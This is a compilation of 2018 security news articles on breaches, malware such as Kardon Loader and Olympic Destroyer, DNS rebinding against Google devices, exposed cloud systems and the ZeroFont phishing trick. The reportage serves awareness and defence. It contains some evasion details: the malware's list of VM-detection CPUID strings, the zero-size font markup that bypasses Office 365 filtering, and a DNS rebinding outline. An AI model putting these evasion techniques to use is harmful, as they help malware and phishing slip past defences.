Researchers Find 21,000 Exposed Container Orchestration Systems
21.6.2018 securityweek 
Vulnerebility

Researchers Discovered More Than 21,000 Container Orchestration and API Management Systems Exposed to the Public Internet

Public cloud and container technology is increasingly used by IT people because of the ease and speed of deployment, ephemeral workloads, and the ability to scale quickly and easily -- basically, the agility that public cloud and containers brings to DevOps. Popular container orchestration systems include Kubernetes, Docker Swarm, OpenShift and Mesosphere.

Container clusters are commonly managed, or orchestrated, from administrator dashboards that provide a single interface to manage all aspects of the containers. Kubernetes says it is comprised of a set of independent, composable control processes that continuously drive the current state towards the provided desired state. It says it eliminates the need for orchestration; but also says it orchestrates computing, networking, and storage infrastructure on behalf of user workloads.

The point, however, is that all the different container orchestrations provide a single administrative dashboard for administrator control. This dashboard can spin up new containers, delete unwanted containers, and access both the compute power and stored data on every container. Rarely, if ever, should this dashboard need to be visible to the internet.

"In early June 2018," states Lacework in a study (PDF) released Tuesday, "Lacework discovered more than 21,000 container orchestration and management systems on the internet, and these results highlight the potential for attack points caused by poorly configured resources, lack of credentials, and the use of non-secure protocols."

The issue here is that if a system is exposed to the internet when it need not be -- indeed should not be -- then it is likely that is inadequately secured. If it has been configured to require multi-factor authentication, then access to the orchestration system will have some defense. But, "simple authentication simply won't be good enough," Lacework's chief security architect, Dan Hubbard, told SecurityWeek: "if you have 'admin' and 'abc123', anyone who can find the admin panel will be able to crack it."

The report notes that most of the management nodes it discovered are configured to require access credentials, but adds, "These organizations, and the others who will replicate their mistakes, are opening themselves up to brute force password and dictionary attacks."

It is generally considered that password security on its own is ineffective. But an insecure container orchestration system exposed on the internet is a bigger threat to a company's cloud-based container infrastructure than a backdoor into a traditional data center. The latter might provide access to a single server under the oversight of the security team and with additional security controls within the data center infrastructure. A container orchestration dashboard, however, provides immediate access to every container in the swarm.

"Consider what would happen," warns the report, "if [attackers] had all this but could operate their attack all from the Internet, hiding behind proxy servers, VPN concentrators, and compromised routers, essentially masking who they are and where they are coming from. Basically, your data, your customer’s data, and the foundation on which you’ve built your organization would be in major trouble."

Hubbard believes the basic problem that leaves orchestration dashboards visible to any potential attacker is a disconnect between the DevOps team and the security team. Faced by the need for development speed, DevOps uses containers for all the right reasons. But containers are outside of the traditional security perimeter; and the security team may not even be aware of their use.

"We need to build a bridge from DevOps to security if one doesn't already exist -- that's the missing piece here," said Hubbard. "It's about communicating and making sure that the security team has the tools to know when this is happening. It's a combination of communication, working together, and for the security team making sure they know when it is happening and/or can detect and handle it when it does happen."

Exposed container orchestration dashboards are potentially far more dangerous than the more frequently discussed misconfigured S3 buckets. S3 buckets are simple storage devices. Misconfiguration of S3 buckets gives unauthorized access to the stored content, but gives no access to any compute capability.

"The most common attack we are seeing now," explained Hubbard, "is that attackers are finding these open servers and they are going in there without the company being aware. The attackers are installing their own software and they're starting new machines and new containers in order to do bitcoin mining. They're doing this through these open panels they find on the internet. In this scenario the bad guys are getting access to your compute -- on all the machines -- and they can install their own code and run whatever they want; and they can access your data. So, it's a lot more powerful than just finding a mis-configured S3 bucket."

"Let’s be clear," says the Lacework report. "We are BIG BELIEVERS in all things public cloud, but we need to raise the bar, and raise it quick." The important thing here is to remove the orchestration panels from the internet.

"You should be able to connect securely through another way," advises Hubbard, "whether it's through a central server or through a direct connection through a VPN. Also, depending on the management technology... if its K8 or whatever... they all have different defaults that they ship with and different ways you can configure authentication. Of course, MFA is the best."

The high-level message from this report is that if you are a developer deploying in the public cloud, then you have a responsibility to think about security; and if you are a security person, and you think that your company is or might be deploying in the public cloud, it's your responsibility to find out and then to deploy technologies and processes around that to make sure that you are secure. At the moment, there are too many examples of this not happening.


Google Devices Leak Precise Physical Locations: Researcher
21.6.2018 securityweek  Attack

A newly discovered attack against Google Home and Chromecast devices can reveal a user’s precise physical location, a security researcher has discovered.

The issue, Tripwire’s Craig Young reveals, is related to two problems common to Internet of Things (IoT) devices: the rare use of authentication for connections received on a local network and the frequent use of HTTP for configuration or control. Because of these poor design choices, websites can sometimes interact with network devices.

Young discovered that Google’s Home app, which is used to configure Google Home and Chromecast, performs some tasks using a local HTTP server, and some commands are sent directly to the device, without authentication.

The app implies that the user should be logged into a Google account linked with the target device, but no authentication mechanism is built into the protocol level, Young says.

Using an attack technique called DNS rebinding, the security researcher was able to “use data extracted from the devices to determine their physical location with astonishing accuracy.” Young also published the video below detailing the attack.

Through DNS rebinding, an attacker can implement a piece of code on a website to bridge to the local network and bypass the same-origin policy (SOP).

The code points to a subdomain of the site, while the DNS server is configured to respond alternatively with an address that both the attacker and localhost control. When the victim accesses the website, the browser resolves to the attacker-controlled DNS server, which has a short time to live (TTL), and then switches to localhost.

“I was able to create a basic end-to-end attack that worked for me in Linux, Windows and macOS using Chrome or Firefox. Starting from a generic URL, my attack first identifies the local subnet and then scans it looking for the Google devices and registers a subdomain ID to initiate DNS rebinding on the victim. About a minute after the page had loaded, I was looking at my house on Google Maps,” Young says.

The security researchers also notes that, even in incognito mode, Google Maps can typically locate a device within 10 meters. This is apparently possible through the analysis of Wi-Fi access point data and triangulation using information collected from devices that opted into Google’s enhanced location services.

The newly discovered attack, the researcher says, can be leveraged for blackmail or extortion purposes, in scams like fake FBI or IRS threats to release sensitive information or photos to friends and family.

Furthermore, because DNS rebinding is not the only way to exploit this bug, browser extensions and mobile apps can abuse “their unrestricted network access to directly query the devices without relying on or waiting for a DNS cache refresh.” Thus, advertisers can obtain location data and correlate it to other tracked web activity to tie it to a real-world identity.

“These problems are not specific to Google devices. Over the years that I’ve been auditing embedded devices, it is not the first time that I’ve seen a device supplying WiFi survey data or other unique device details like serial numbers. Smart TV’s, for example, commonly identify themselves with a unique screen ID as part of the DIAL protocol used to support Cast-like functionality,” Young says.

While the best mitigation is to completely disconnect devices, Young agrees that in today’s connected world such an option might not be possible. However, there are steps users can take to minimize exposure.

One way to dealing with this is network segmentation, where all connected devices use their own network, separate from the normal home network where all Internet browsing occurs. Adding a second router on the network, specifically for these connected devices, is the best option for most users, the researcher suggests.

Using a DNS rebind protection solution is another way to prevent such an attack. According to Young, the DNS software commonly used in consumer routers does include DNS rebind protection, although it isn’t always enabled or easy to enable. Deploying a local DNS server with rebinding protections enabled is also an option.

“In the face of DNS rebinding and mobile apps, all services running on the local network (and especially HTTP services) must be designed as if they were directly exposed to the Internet. We must assume that any data accessible on the local network without credentials is also accessible to hostile adversaries. This means that all requests must be authenticated and all unauthenticated responses should be as generic as possible,” Young says.


Flight Tracker Flightradar24 Hit by Data Breach
21.6.2018 securityweek  CyberCrime

Flightradar24 hacked

Flightradar24, a highly popular flight tracking service based in Sweden, has instructed some users to change their passwords after detecting a breach on one of the company’s servers.

Earlier this week, some Flightradar24 users started receiving emails alerting them of a security breach in which email addresses and password hashes associated with accounts registered prior to March 16, 2016, may have been compromised.

Some of the individuals who received the notification complained that the emails looked like phishing attempts, especially since the company had not mentioned the incident on its website or social media channels. It has however confirmed to users who inquired via social media and the company’s forum that the emails are legitimate.

In response to posts on the Flightradar24.com forum, a company representative highlighted that no personal information was compromised, and noted that payment information is not stored on its systems.

Flightradar24 said it was confident that the incident had been contained after the targeted server was “promptly” shut down after the intrusion was detected.

The company did not specify which hashing algorithm was used for the exposed passwords, but noted that the compromised system had been retired and used an older algorithm that allows for the hashes to be cracked. Affected users’ passwords have been reset as a result. The flight tracker says it has been using a more secure hashing algorithm since 2016.

The company has not said how many users are impacted – it’s notification only mentions that the incident affects a “small subset of Flightradar24 users.” However, considering that the service is said to have more than 40 million users per month and its mobile applications are among the most installed apps on Google Play and the Apple App Store, even a “small subset” could be a significant number.

FlightRadar24 says it has notified the Swedish Data Protection Authority in order to comply with the EU’s General Data Protection Regulation (GDPR).


Kardon Loader Allows Anyone to Build a Distribution Network
21.6.2018 securityweek 
Virus

The author of a newly discovered malware downloader allows interested parties to set up a botshop and build a malware distribution network, Netscout Arbor reveals.

Dubbed Kardon Loader, the downloader started being advertised on underground forums as a paid beta product on April 21, 2018. The actor behind it, using the online handler Yattaze, asks $50 for the malicious program and offers it as a standalone build, with charges for each additional rebuild. He/she also allows customers to set up a botshop and sell access to their own operation.

Downloader malware and botshops are typically used by malware authors and distributors to build networks and create botnets that are then leveraged for the distribution of information stealers, ransomware, banking Trojans, and other threats. These networks are often offered as a service on underground markets.

The newly observed Kardon Loader appears to be a rebrand of the ZeroCool botnet, which was developed by the same actor (who had an account on the forum since April 2017 and received multiple vouches for this product).

The actor, Netscout Arbor reveals, is using a professional looking advertisement for the loader, with its own logo, and provides a disclaimer claiming that the software should not be used maliciously. The developer also published a YouTube video detailing the downloader’s admin panel functionality.

Kardon Loader, the actor claims, has bot functionality, can download/execute/update/uninstall tasks, has debug and analysis protection, supports TOR and Domain Generation Algorithm (DGA), includes usermode rootkit functionality, and RC4 encryption (not yet implemented).

“ASERT found many of these features absent in the samples reviewed. All samples analyzed used hard-coded command and control (C&C) URLs instead of DGA. There was also no evidence of TOR or user mode rootkit functionality in the binaries,” the security firm reveals.

For anti-analysis, the malware downloader attempts to get the module handle for a variety of DLLs associated with antivirus, analysis, and virtualization tools, and exits its process if any of the targeted handles are returned.

Kardon Loader can also enumerate the CPUID Vendor ID value and compare it against values associated with virtual machines (such as Microsoft HV, VMware, and VBox). Should any of them be detected, the malware also exits.

The threat uses a HTTP-based C&C infrastructure and base64 encoded URL parameters. When executed, the malware sends HTTP POSTs to the C&C server, with information such as an identification number, operating system, user privilege, initial payload, computer name, user name, and processor architecture.

Depending on the server response, the malware can download and execute additional payloads, visit a website, upgrade current payloads, or uninstall itself.

The administration panel has a simple design, with a dashboard where bot distribution and install statistics are displayed. A “bot store” feature allows the bot admin to generate access keys for customers, providing them with the ability to execute tasks based on the predefined parameters.

“Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking Trojans/credential theft etc. […] Although only in public beta stage this malware features bot store functionality allowing purchasers to open up their own botshop with this platform,” Netscout Arbor concludes.


Massachusetts Man Pleads Guilty to ATM Hacking
21.6.2018 securityweek  Crime

A Massachusetts man pleaded guilty to his role in an ATM “jackpotting” operation, the United States Department of Justice announced this week.

ATM jackpotting is a type of attack where individuals who have physical access to an automated teller machine connect to it and then use malware or specialized electronic equipment (or both) to gain control of the system’s operations.

Long observed in Europe and Asia, ATM jackpotting only arrived in the United States in late 2017. In January 2018, the US Secret Service issued a warning to alert law enforcement and financial institutions on jackpotting attacks. Incidents were observed in Connecticut and elsewhere.

In early February, the DoJ announced that Alberto Fajin-Diaz, 31, a citizen of Spain, and Argenys Rodriguez, 21, of Springfield, Massachusetts, were charged over ATM jackpotting after being arrested on January 27 after being found near an ATM compromised with jackpotting malware to dispense $20 bills.

On Monday, John H. Durham, United States Attorney for the District of Connecticut, announced that Rodriguez pleaded guilty to his role in the ATM jackpotting scheme.

After being alerted by Citizens Bank investigators of a possible jackpotting attack on an ATM in Cromwell, the police encountered Rodriguez and Fajin-Diaz in the vicinity of an “ATM that had been compromised with malware and was in the process of dispensing $20 bills,” the DoJ says.

In the duo’s vehicle, the police found tools and electronic devices that could be used to compromise ATMs to dispense cash. The two men also had around $5,600 in cash, yet the investigation revealed that over $63,000 had been taken from the ATM on that date.

The investigators later discovered that, on January 22, 2018, Rodriguez, Fajin-Diaz and others illegally obtained $63,820 from a Citizens Bank ATM in Rhode Island.

Rodriguez is scheduled to be sentenced on September 26, 2018. He faces a maximum term of imprisonment of 30 years. Fajin-Diaz pleaded guilty to his role in the ARM jackpotting attacks on June 12, 2018, and awaits sentencing.


Thousands of Mobile Apps Leak Data from Firebase Databases
21.6.2018 securityweek  Mobil

Thousands of mobile applications running on iOS and Android have exposed over 113 gigabytes of data from 2,300 unsecured Firebase databases, enterprise mobile security firm Appthority says in a new report.

The new research follows last year’s report into the HospitalGown attack vector, which revealed that more than 1,000 mobile apps on enterprise devices were exposing potentially sensitive data via insecure connections with backend servers.

Similar to the HospitalGown vulnerability, which was found in mobile applications’ architecture and infrastructure, the new security flaw resides in mobile app developers failing to require authentication to a Google Firebase cloud database.

One of the most popular backend database technologies for mobile apps, Firebase does not secure user data by default. It does not warn developers when data is not secure and does not provide third-party encryption tools either.

To ensure data is secure, app builders need to specifically implement user authentication on all database tables and rows, but that rarely happens, Appthority explains in a report (PDF). Because of that, an attacker can easily find open Firebase app databases and access private records.

The security issue, which the security firm refers to as the Firebase vulnerability, has a huge impact, leaking 100 million records (113 gigabytes) of data from unsecured Firebase databases.

After digging through millions of applications, the security researchers discovered 28,502 mobile apps (27,227 Android and 1,275 iOS apps) connected to a Firebase database, 3,046 of which (10.69%) were found vulnerable (2,446 Android and 600 iOS apps).

The 3,000 vulnerable applications, the security firm notes, exposed over 100 million records of data from 2,300 vulnerable databases (1 in 10 Firebase databases, or 10.34%, were found vulnerable). On Android alone, the vulnerable applications had more than 620 million downloads.

Impacted applications belong to multiple categories, including tools, productivity, health and fitness, communication, finance and business apps, and impact over 62% of enterprises.

Affected organizations included banks, telecoms, postal services, ride sharing companies, hotels and educational institutions in the United States, Europe, Argentina, Brazil, Singapore, Taiwan, New Zealand, India, and China.

Analysis of the exposed data revealed 2.6 million plain text passwords and user IDs; more than 4 million Protected Health Information records (including chat messages and prescription details); 25 million GPS location records; 50 thousand financial records including banking, payment and Bitcoin transactions; and over 4.5 million Facebook, LinkedIn, Firebase and corporate data store user tokens.

The report reveals that 975 (40%) of the vulnerable apps were business-related, installed in active customer environments, leaking corporate private keys and access credentials (potentially allowing attackers to exfiltrate sensitive intellectual property), private business conversations, and sales information.

The number of applications connecting to Firebase databases has increased significantly since 2015, and so did the number of vulnerable applications. Between 2015 and 2016, apps using Firebase grew 2,112%, while the vulnerable apps grew 1,225%. Between 2016 and 2017, the growth rates were of 271% and 74%, respectively.

“The Firebase vulnerability is a significant and critical mobile vulnerability exposing vast amounts of sensitive data. The large number of vulnerable apps and the wide variety of data shows that enterprises can’t rely on mobile app developers, app store vetting or simple malware scans to address data security,” Seth Hardy, Appthority Director of Security Research, commented.


macOS' Quick Look Cache May Leak Encrypted Data
21.6.2018 securityweek  Apple

The Quick Look mechanism on macOS, which allows users to check file contents without actually opening the files, may leak information on cached files, even if they reside on encrypted drives or if the files have been deleted.

According to Apple, “Quick Look enables apps like Finder and Mail to display thumbnail images and full-size previews of Keynote, Numbers, Pages, and PDF documents, as well as images and other types of files.”

Quick Look registers the com.apple.quicklook.ThumbnailsAgent XPC service, which creates a thumbnails database and stores it in the /var/folders/.../C/com.apple.QuickLook.thumbnailcache/ directory.

The issue, discovered by Wojciech Regu³a, is that the service creates thumbnails of all supported files located in an accessed folder, regardless of whether the folder resides on an internal or external drive. It does the same for macOS Encrypted HFS+/APFS drives as well.

Because of that, the SQLite database in the com.apple.QuickLook.thumbnailcache/ directory contains previews, metadata and file paths of photos and other files in the accessed folders, depending on the file type and the installed Quick Look plugins.

Said thumbnails, however, are not created only for the files a user has chosen to preview with Quick Look (which automatically results in the service caching file information), but for other files residing in the accessed folders as well.

While the created thumbnails for previewed files are larger, smaller thumbnails are created for the other files, but even those could be used to leak content, Objective-See’s Patrick Wardle suggests.

To demonstrate the bug, Regu³a created a VeraCrypt container, mounted it, and saved an image in it. He also cached it in Quick Look by pressing space on it. Next, he placed a second photo in macOS Encrypted HFS+/APFS drive.

With both images cached, information about the full paths and the file names is stored in the aforementioned database, and the researcher used a modified script to exfiltrate the thumbnails.data file and retrieve the miniatures.

“This technique is known and helps a lot in forensics, but I honestly didn't know about this before. It was the big surprise for me to see that even files stored in encrypted containers may be that cached. Have it on mind when you will be using space to preview photos,” Regu³a notes.

According to Wardle, this behavior “can be replicated in a password-protected encrypted AFPS container.” When creating a file in the container, a thumbnail of the file is created and cached even if the user simply views the container in the UI, without previewing the file, he explains.

Even if the encrypted volume is unmounted, the thumbnail of the file continues to be stored in the temporary directory, meaning that it can be extracted. The cached thumbnails are created for files on USB drives that users insert into their Macs as well.

“Depending on the size of the 'preview' images generated for Finder (and other variables, such as the size of the font used in the file), the contents of the even documents may be discernible from the thumbnail alone,” Wardle notes.

With the main drive encrypted, the cached data remains safe on a powered off system, but it can be revealed to an attacker or law enforcement accessing the system, even if the password-protected encrypted containers have been unmounted.

However, it is possible to clear the Quick Look cache when unmounting a container, using the qlmanage utility. The qlmanage -r cache command should immediately purge the cache, without requiring a system reboot.


Building a malware distribution network is too easy with Kardon Loader
21.6.2018 securityaffairs 
Virus

Researchers at Netscout Arbor have discovered a malware downloader advertised on underground forums as a paid open beta product, its name is Kardon Loader.
Researchers from Netscout Arbor have discovered a downloader advertised on underground forums dubbed Kardon Loader, it allows customers to build a malware distribution network or a botshop.

Advs for Kardon Loader were first discovered on April 21, 2018, the author who goes online with the moniker Yattaze asks $50 for the application program and offers it as a standalone build, charging users for each additional rebuild.

“Kardon Loader is a malware downloader advertised on underground forums as a paid open beta product.” reads a blog post published by Netscout Arbor.

“The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.”

Downloader malware and botshops are essential components for the creation of botnets that could be used to distribute a broad range of malware such as ransomware, banking Trojans, and cryptocurrency miners.

Crooks use to offer the access to distribution networks as a service in cybercrime underground markets.

Experts believe the Kardon Loader represents a rebrand of the ZeroCool botnet that was built by the same actor.

The advertisement for the Kardon Loader appears very professional, the actor created its own logo and provides a disclaimer claiming that the software should not be used for malicious purposes. He also published a YouTube video that shows the admin panel of the platform.

Below the bot functionalities advertised by the actor:

Bot Functionality
Download and Execute Task
Update Task
Uninstall Task
Usermode Rootkit
RC4 Encryption (Not Yet Implemented)
Debug and Analysis Protection
TOR Support
Domain Generation Algorithm (DGA)
Researchers from ASERT analyzed some samples of the malicious code and noticed that some features were not implemented, for example, all samples were using hard-coded command and control (C&C) URLs instead of DGA, both the “usermode rootkit” and Tor support were not implemented.

The experts determine that the malware downloader checks for the handle for a variety of DLLs associated with antivirus, analysis, and virtualization tools, and halts its process if any of the handles are returned.

To avoid the execution in a virtualized environment, the Kardon Loader also enumerate the CPUID Vendor ID value and compare it against the following strings:

KVMKVMKVM
Microsoft Hv
VMwareVMware
XenVMMXenVMM
prl hyperv
VBoxVBoxVBox
These are known CPUID Vendor ID values associated with virtualized machines. If one of these values are detected the malware will also exit

Kardon Loader can also enumerate the CPUID Vendor ID value and compare it against a list of known values associated with virtual machines (KVMKVMKVM, Microsoft Hv, VMwareVMware, XenVMMXenVMM, prl hyperv, VBoxVBoxVBox).

The malicious code uses a HTTP-based C&C infrastructure with URL parameters that are base64 encoded.

“Upon execution Kardon Loader will send HTTP POSTs to the C2 with the following fields:

ID = Identification Number
OS = Operating System
PV = User Privilege
IP = Initial Payload (Full Path)
CN = Computer Name
UN = User Name
CA = Processor Architecture”
In turn, the server provides instructions to the malware, such as download and execute additional payloads, visit a website, upgrade current payloads, or uninstall itself.

The administration panel is very simple, it implements a dashboard that provides information about the bot distribution and statistics about the installations.

kardon loader panel1-1024x512

“A notable feature of this panel is the bot store functionality allowing the bot admin to generate access keys to customers that would give them the ability to execute tasks based on the predefined parameters” continues the analysis,

“Although only in public beta stage this malware features bot store functionality allowing purchasers to open up their own botshop with this platform,”

The analysis includes the IoCs that could be used by organizations to block malicious activity associated with Kardon Loader.


ZeroFont phishing attack can bypass Office 365 protections
21.6.2018 securityaffairs
Phishing

ZeroFont phishing attack – Crooks are using a new technique that involves manipulating font sizes to bypass Office 365 protections.
According to cloud security firm Avanan, one of the detection mechanisms in Office 365 involves natural language processing to identify the content of the messages typically used in malicious emails.

For example, an email including the words “Apple” or “Microsoft” that are not sent from legitimate domains, or messages referencing user accounts, password resets or financial requests are flagged as malicious.

Experts from Avanan discovered phishing campaigns using emails in which some of the content is set to be displayed with zero-size font using <span style=”FONT-SIZE: 0px”>, for this reason, they dubbed the technique ZeroFont.

“Recently, we have been seeing a number of phishing attacks using a simple strategy to get their blatant email spoofs past Microsoft’s phishing scans. The tactic, which we are calling ZeroFont, involves inserting hidden words with a font size of zero that are invisible to the recipient in order to fool Microsoft’s natural language processing.” reads the analysis published by Avanan.

The email appears to the recipient as normal, but Microsoft’s filters are able to analyze also the text having a font size of “0”.

phishing zerofont

Summarizing, while the user sees a classic phishing content like this:

phishing zerofont

Microsoft’s filter will see the overall text including words written with “FONT-SIZE: 0px” attribute. This text, of course, doesn’t appear as a malicious content:

phishing zerofont

“Microsoft can not identify this as a spoofing email because it cannot see the word ‘Microsoft’ in the un-emulated version. Essentially, the ZeroFont attack makes it possible to display one message to the anti-phishing filters and another to the end user,” Avanan’s Yoav Nathaniel said in a blog post.

Natural language processing is essential to prevent phishing attacks, but a technique like ZeroFont demonstrated that attackers can bypass filters with a trick.

In the past, other techniques were devised to bypass anti-phishing filters, for example, the Punycode phishing attack, the baseStriker phishing attack, the Unicode phishing attack, and the Hexadecimal Escape Characters phishing attack.


Hackers Steal $31 Million from South Korean cryptocurrency exchange Bithumb
21.6.2018 securityaffairs  Cryptocurrency

Just weeks after Korean exchange Coinrail was hacked, the Bithumb crypto exchange was hacked, crooks stole over $30 million in cryptocurrency.
It has happened again, for the second time in a year, the cryptocurrency exchange Bithumb has been hacked.

The South Korean cryptocurrency exchange confirmed that hackers stole 35 billion won ($31.6 million) worth of cryptocurrency between June 19 and June 20.

In response to the incident, the exchange moved all funds to cold wallets and temporarily suspended the deposits and blocked user withdrawals.

Bithumb

@BithumbOfficial
[Notice for the temporary suspension of the deposits]
Due to the increasing safety issues, we are changing our wallet system.
Please do not deposit until we notify.
*All deposits are not deposited into your wallet until all changes are completed.

2:49 AM - Jun 20, 2018
72
56 people are talking about this
Twitter Ads info and privacy

Bithumb

@BithumbOfficial
Replying to @BithumbOfficial
*All deposit and withdrawal service will be stopped to make sure the security. We will keep notice you of the restart of the service. We apologize for your inconvenience and thanks for your understanding.

3:04 AM - Jun 20, 2018
197
179 people are talking about this
Twitter Ads info and privacy
At the time of writing, Bithumb did not reveal any details about the security breach, but it announced that it will cover losses.

“We have noticed that between the last night and today morning, about 35,000,000,000 KRW worth cryptocurrencies have been stolen. However, this loss will be compensated by Bithumb’s own reservoir, and all of our assets are securedly saved in Bithumb’s cold wallet.” reads the security advisory published by Bithumb.

“However, due to implementation enhancement as well as security check on deposit / withdrawal services, cryptocurrency deposit / withdrawal and KRW withdrawal service will be halted for time being and services are thoroughly reviewed.”

Bithumb is one of the top 10 most popular cryptocurrency exchanges, experts noticed that Bitcoin price fell 3 percent following the announcement of the incident.

Bithumb hacked bitcoin price.jpg

This is the second time in a year that Bithumb suffers a security breach, in July 2017 hackers have stolen more than $1 Million in Bitcoin and Ether cryptocurrencies from the accounts of several users of the exchange.

Experts argued that the overall funds stolen at the time were greater than initially thought.

A few weeks ago, another South Korean exchange, Coinrail, announced a cyberheist. Attackers stole over $40M worth of ICO tokens that were maintained in the servers of the exchange.

In December, the South Korea cryptocurrency exchange Youbit shut down after a being hacked two times in a few months.


China-linked Thrip APT group target defense and satellite firms
21.6.2018 securityaffairs  APT

Symantec tracked a new APT group named Thrip that targeted0 satellite operators, telco companies and defense contractors in the US and Southeast Asia.
Chinese APT groups are always very active, experts at Symantec have tracked a new APT group named Thrip that has breached the systems of satellite operators, telecommunications companies and defense contractors in the United States and Southeast Asia.

The Thrip group has been active since 2013, but this is the first time Symantec publicly shared details of its activities.

“We’ve been monitoring Thrip since 2013 when we uncovered a spying campaign being orchestrated from systems based in China. Since our initial discovery, the group has changed its tactics and broadened the range of tools it used. Initially, it relied heavily on custom malware, but in this most recent wave of attacks, which began in 2017, the group has switched to a mixture of custom malware and living off the land tools. ” reads the analysis published by Symantec.

Thrip APT

Thrip APT used a combination of custom malware and legitimate tools in its attacks, the list of victims is long and include a satellite communications operator.

The hackers targeted devices involved in operations and infected computers running software that monitors and controls satellites, this circumstance suggests the attackers may also interested in sabotage.

Another victim of the group is a company specializing in geospatial imaging and mapping.

“[Thrip] targeted computers running MapXtreme GIS (Geographic Information System) software which is used for tasks such as developing custom geospatial applications or integrating location-based data into other applications. It also targeted machines running Google Earth Server and Garmin imaging software.” continues the analysis.

“The satellite operator wasn’t the only communications target Thrip was interested in. The group had also targeted three different telecoms operators, all based in Southeast Asia.”

The group also targeted three telecoms firms in Southeast Asia and a defense contractor.

The arsenal of the group includes the data stealer Trojan.Rikamanu and its evolution Infostealer.Catchamas that implements more sophisticated data strealing features and evasion capabilities.

The APT group also used the Trojan.Mycicil, a keylogger that is available for sale on Chinese underground marketplaces, and the Backdoor.Spedear and Trojan.Syndicasec malware.

The Thrip APT also many legitimate tools, including the Windows SysInternals utility PSExec, PowerShell, Mimikatz, and the LogMeIn remote access software.

Further details, including IoCs are reported in the analysis published by Symantec.


Flight tracking service Flightradar24 suffered a data breach
21.6.2018 securityaffairs  Incindent

The popular flight tracking service Flightradar24 has discovered a data breach that affected one of its servers.
The company notified the incident to its users via email and asked them to change their passwords, affected users’ passwords have been reset.

FlightRadar24 promptly reported the incident to the Swedish Data Protection Authority in order to comply with the EU’s General Data Protection Regulation (GDPR).

According to Flightradar24, hackers may have accessed email addresses and password hashes associated with accounts registered prior to March 16, 2016.

At the time there is no information about the hashing algorithm that was used to protect the passwords,

Initially many users that received the message believed that the data breach notification was the result of a phishing campaign because there was no official news from Flightradar24, but later the company admitted the incident and confirmed that the emails were legitimate.

Senile Delinquent
@SenileDelinque1
18 Jun
@flightradar24 Is this for real or is a phishing expedition? Clicking on the Unsubscribe link at the end of the email takes me to an odd website. Anyone else had this? pic.twitter.com/3P0Lensv5B

Flightradar24

@flightradar24
Hello, it is legitimate. We have already invalidated your old password and the link in the email will allow you to create a new password. We apologize for any inconvenience this may cause.

4:13 PM - Jun 18, 2018
1
See Flightradar24's other Tweets
Twitter Ads info and privacy
A moderator of the Flightradar24.com forum confirmed that no personal and financial information was exposed.

“We can confirm that the email some of our users received in regards to a security breach has been sent by us. The security breach may have compromised the email addresses and hashed passwords for a small subset of Flightradar24 users (those who registered prior to March 16, 2016).

We would like to apologize that this breach occurred and for the inconvenience this may cause. We would also like to stress that we have no indication any of personal information was compromised.” wrote a company spokesman on the official forum.

“The security breach was limited to one server and it was promptly shut down once the intrusion attempt had been ascertained. An email has been sent to users with affected accounts. Please note that no payment information has been compromised. Flightradar24 neither handles nor stores payment information.”

FlightRadar24

The company added that it has contained the incident, just after it discovered one of its servers was compromised it shut down the machine.

The bad news is that the company admitted that passwords were protected by an old hashing algorithm that allows attackers to crack the hashes, Flightradar24 introduced a more secure hashing algorithm only since 2016.

At the time it is not clear how many users have been affected, the company reported that the incident involved only “small subset” of users.

FlightRadar24 claims to have over than 40 million users per month, this means that the number of affected users could be anyway important.

FlightRadar24 promptly reported the incident to the Swedish Data Protection Authority in order to comply with the EU’s General Data Protection Regulation (GDPR).


Chronicle launches VirusTotal Monitor to reduce false positives
21.6.2018 securityaffairs  Security

Alphabet owned cybersecurity firm Chronicle announced the launch of a new VirusTotal service that promises to reduce false positives.
VirusTotal Monitor service allows developers to upload their application files to a private cloud store where they are scanned every day using anti-malware solutions from antivirus vendors in VirusTotal.

Every time the service flags the file as malicious, VirusTotal notifies it to antivirus vendor and to the developer.

Of course, files analyzed by the VirusTotal Monitor service will remain private and are not shared by the company with third-parties.

The service implements a Google-drive like interface to allow developers to upload their files and a dashboard to display the scan results. Both developers and AV companies could access the dashboard, the service also provided APIs to integrate Monitor with their tools implemented by developers and antivirus vendors.

“Enter VirusTotal Monitor. VirusTotal already runs a multi-antivirus service that aggregates the verdicts of over 70 antivirus engines to give users a second opinion about the maliciousness of the files that they check.” reads the announcement published by VirusTotal.

“For antivirus vendors this is a big win, as they can now have context about a file: who is the company behind it? when was it released? in which software suites is it found? What are the main file names with which it is distributed? For software developers it is an equally big win, as they can upload their creations to Monitor at pre-publish stage, to ensure a release without issues.”

VirusTotal Monitor

VirusTotal pointed out that Monitor service is not a free pass to get any file whitelisted.

“Sometimes vendors will indeed decide to keep detections for certain software, however, by having contextual information about the author behind a given file, they can prioritize work and take better decisions, hopefully leading to a world with less false positives,” continues the announcement.

“The idea is to have a collection of known source software, then each antivirus can decide what kind of trust-based relationship they have with each software publisher.”

Are you interested in this service? Now you can request a trial period for VirusTotal Monitor.


Olympic Destroyer is still alive
20.6.2018 Kasperksy
Virus

In March 2018 we published our research on Olympic Destroyer, an advanced threat actor that hit organizers, suppliers and partners of the Winter Olympic Games 2018 held in Pyeongchang, South Korea. Olympic Destroyer was a cyber-sabotage attack based on the spread of a destructive network worm. The sabotage stage was preceded by reconnaissance and infiltration into target networks to select the best launchpad for the self-replicating and self-modifying destructive malware.

We have previously emphasized that the story of Olympic Destroyer is different to that of other threat actors because the whole attack was a masterful operation in deception. Despite that, the attackers made serious mistakes, which helped us to spot and prove the forgery of rare attribution artefacts. The attackers behind Olympic Destroyer forged automatically generated signatures, known as Rich Header, to make it look like the malware was produced by Lazarus APT, an actor widely believed to be associated with North Korea. If this is new to the reader, we recommend a separate blog dedicated to the analysis of this forgery.

The deceptive behavior of Olympic Destroyer, and its excessive use of various false flags, which tricked many researchers in the infosecurity industry, got our attention. Based on malware similarity, the Olympic Destroyer malware was linked by other researchers to three Chinese speaking APT actors and the allegedly North Korean Lazarus APT; some code had hints of the EternalRomance exploit, while other code was similar to the Netya (Expetr/NotPetya) and BadRabbit targeted ransomware. Kaspersky Lab managed to find lateral movement tools and initial infection backdoors, and has followed the infrastructure used to control Olympic Destroyer in one of its South Korean victims.

Some of the TTPs and operational security used by Olympic Destroyer bear a certain resemblance to Sofacy APT group activity. When it comes to false flags, mimicking TTPs is much harder than tampering with technical artefacts. It implies a deep knowledge of how the actor being mimicked operates as well as operational adaptation to these new TTPs. However, it is important to remember that Olympic Destroyer can be considered a master in the use of false flags: for now we assess that connection with low to moderate confidence.
